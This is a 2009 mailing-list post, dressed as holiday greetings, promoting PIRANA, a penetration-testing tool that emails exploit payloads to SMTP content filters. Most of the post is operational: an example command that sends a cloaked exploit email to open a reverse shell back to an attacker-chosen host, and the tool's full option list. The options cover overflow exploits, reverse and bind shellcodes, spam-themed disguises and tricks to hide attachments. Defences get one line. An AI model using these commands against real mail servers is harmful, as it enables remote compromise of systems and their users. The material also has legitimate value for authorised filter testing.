HackFest Series: Pirana Email Holiday Greetings

Lisa Kachold lisakachold at obnosis.com
Thu Dec 24 17:48:19 MST 2009 

Pirana

PIRANA is a penetration testing framework to help in checking a SMTP
content filter's security. It works by attaching an exploit to an
email, optionally disguising it from content filters. PIRANA also lets
you choose from different type of shellcodes to use and has various
options to be stealthy.

http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf
http://backtrack.offensive-security.com/index.php/Tools#Pirana

Posted Last Year at Xmas to PLUG Archives from Backtrack2 (obfuscated
without full links or correct pirana.pl spelling):
http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html

The Bt2 HowTo:
http://www.linuxhaxor.net/?p=337

Solutions to protect include clamav/spamassassin but this could depend
on your spamassassin and other installation specifics.

Pirana.pl example:  Connect back with a reverse shell just by sending an email
using cloaking.


$ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
[EMAIL PROTECTED]


Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]

Mandatory arguments:
  -e+           Exploit number to use (See below)
  -h+           SMTP server to test
  -a+           Destination email address used in probing

Optional arguments:
  -s+          Shellcode type to inject into exploits (See below)
  -c+          Cloaking style (See below)
  -d+          Try to vanish attachments from MUA's view (See below)
  -v            Attach EICAR virus to improve stealthness
  -z            Pack all the malware into a tarball to be less noisy
  -p+          Port to use in reverse shell or bind shell
  -l+           Host to connect back in reverse shell mode

Valid exploits numbers:
   0            OSVDB #5753:    LHA get_header File Name Overflow
   1            OSVDB #5754:    LHA get_header Directory Name Overflow
   2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
   3            OSVDB #11695:   unarj Filename Handling Overflow
   4            OSVDB #23460:   ZOO combine File and Dir name overflow
   5            OSVDB #15867:   Convert UUlib uunconc integer overflow
   6            OSVDB #XXX:     ZOO next offset infinite loop DoS

Valid shellcode types:
   0            TCP reverse shell
   1            UDP reverse shell
   2            TCP bind shell

Valid cloaking styles (consult whitepaper for visual result):
   0            No cloaking at all (default)
   1            Viagra spam message
   2            "Look at the pictures I promised you!"

Vanishing techniques for attachments:
   0            No vanishing at all (default)
   1            Multipart/alternative trick
   2            <img src="image.JPG" width=0 height=0> trick


Test Test Test!
Merry merry merry!
-- 
Skype: (623)239-3392
AT&T: (503)754-4452
http://uncyclopedia.wikia.com/wiki/Santa

More information about the PLUG-discuss mailing list